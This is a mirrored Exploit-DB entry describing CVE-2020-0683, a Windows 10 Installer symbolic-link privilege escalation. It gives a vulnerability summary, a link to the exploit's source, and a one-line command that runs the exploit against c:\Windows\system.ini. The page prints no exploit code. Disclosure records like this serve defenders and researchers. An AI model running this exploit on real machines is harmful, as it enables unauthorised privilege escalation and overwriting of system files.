bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/48079.txt
Offensive Security 228a37da9c DB: 2020-02-18 
15 changes to exploits/shellcodes

HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
Cuckoo Clock v5.0 - Buffer Overflow

Anviz CrossChex - Buffer Overflow (Metasploit)
SOPlanning 1.45 - 'by' SQL Injection
Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
Avaya Aura Communication Manager 5.2 - Remote Code Execution
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - 'users' SQL Injection
LabVantage 8.3 - Information Disclosure
2020-02-18 05:01:54 +00:00

104 lines
No EOL
2.8 KiB
Text
Raw Blame History

# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Author: nu11secur1ty
# Date: 2020-02-14
# Vendor: Microsoft
# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
# CVE: CVE-2020-0683
[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHUB
[+] twitter.com/nu11secur1ty
[Exploit Program]
Link:
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
[Vendor]
Microsoft
[Vulnerability Type]
Windows Installer Elevation of Privilege Vulnerability
[CVE Reference]
An elevation of privilege vulnerability exists in the Windows Installer
when MSI packages process symbolic links. An attacker who successfully
exploited this vulnerability could bypass access restrictions to add or
remove files.
To exploit this vulnerability, an attacker would first have to log on to
the system. An attacker could then run a specially crafted application that
could exploit the vulnerability and add or remove files.
The security update addresses the vulnerability by modifying how to reparse
points are handled by the Windows Installer.
[Security Issue]
Elevation of Privilege from user to C:\Windows\administartion execution
files
[References]
# CVE-2020-0683
Original Poc sent to MSRC.
Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683
Source code for Visual Studio C++ 2019
Inside "nu11secur1ty" you'll find the exploit (exe) to execute.
# Note:
This test is using `system.ini` in c:\Windows\system.ini
When you exploit this file you should replace with the original file
`system.ini` after this test, which you will find in CVE-2020-0683
directory :)
--------------------------------------------------------------------------
- - How to run the exploit
Go into "nu11secur1ty" directory and from a cmd console launch:
- for the test
MsiExploit.exe c:\Windows\system.ini"
Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory.
- Disclaimer:
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
- @nu11secur1ty
[Network Access]
Local
[Disclosure Timeline]
02/11/2020
[Disclaimer]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
nu11secur1ty
--
Reference in a new issue View git blame Copy permalink